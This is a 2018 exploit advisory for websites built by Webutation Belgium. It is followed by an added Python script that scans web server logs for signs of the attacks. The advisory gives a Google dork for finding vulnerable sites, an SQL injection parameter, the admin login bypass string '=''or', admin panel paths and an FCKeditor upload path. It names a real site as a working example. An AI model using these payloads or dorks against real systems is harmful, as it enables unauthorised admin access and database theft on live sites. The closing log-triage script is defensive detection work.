Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities

2018.09.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#################################################################################################

# Exploit Title : Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 18/09/2018
# Vendor Homepage : webutation.net ~ webutation.org
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ] + CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]

#################################################################################################

# Google Dork : intext:Copyright © 2011 - 2018 Webutation site:be © Webutation 2018

# SQL Injection Exploit =>

/activiteit.php?id=[SQL Inj]

# Admin Panel Login Path =>

/admin/login.php

# Admin Login Bypass Exploit :

Username : '=''or'
Password : '=''or'

# Useable Admin Panel Control URL Links =>

/admin/ingelogged.php
/admin/activiteiten.php
/admin/info.php
/admin/medewerkers.php
/admin/leden.php
/admin/gastenboek.php
/admin/verslagen.php

# FCKEditor Filemanager Exploit =>

TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html
TARGET/yourfilenamehere.txt

#################################################################################################

# Example Site => tgeverke.be => [ Proof of Concept for Authentication Bypass ] => archive.is/OQ8GQ

# Example Site for SQL Inj => tgeverke.be/activiteit.php?id=465%27

# SQL Database Error =>

FOUT1: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''465''' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
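For site operators checking whether the paths above were requested, here is a log triage sketch. It is an added example, not part of the original advisory or of the vendor's code. It assumes the web server writes Combined Log Format; the sample log lines and the function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Paths below are the ones listed in the advisory.
ADMIN_PAGES = ("/admin/ingelogged.php", "/admin/activiteiten.php", "/admin/info.php",
               "/admin/medewerkers.php", "/admin/leden.php", "/admin/gastenboek.php",
               "/admin/verslagen.php")
FCK_TEST = "/fckeditor/editor/filemanager/connectors/uploadtest.html"
# Assumed Combined Log Format: ip - user [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

SAMPLE_LOG = [  # constructed lines using documentation IP ranges
    '192.0.2.10 - - [18/Sep/2018:10:00:01 +0200] "GET /activiteit.php?id=465 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Sep/2018:10:00:05 +0200] "GET /activiteit.php?id=465%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Sep/2018:10:00:09 +0200] "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 3011 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [18/Sep/2018:10:00:12 +0200] "GET /admin/leden.php HTTP/1.1" 200 9050 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [18/Sep/2018:10:01:00 +0200] "GET /admin/leden.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

def classify(line):
    """Return (client_ip, finding) for a request worth reviewing, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    if path.endswith("/activiteit.php"):
        # parse_qs percent-decodes, so %27 is compared as a quote character.
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        if any(not (v.isascii() and v.isdigit()) for v in ids):
            return ip, "non-numeric id on activiteit.php"
    elif path.endswith(FCK_TEST):
        return ip, "FCKeditor upload test page requested"
    elif path.endswith(ADMIN_PAGES) and status == "200":
        # Legitimate admins also produce this; compare against known sessions.
        return ip, "admin page served with 200"
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```

Access logs do not record POST bodies, so the login bypass string itself will not appear there; an admin page returned with status 200 to an unfamiliar client is the visible trace to follow up.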

References:

https://www.cyberizm.org/cyberizm-copyright-%C2%A9-2011-2018-webutation-belgium-multiple-vuln.html

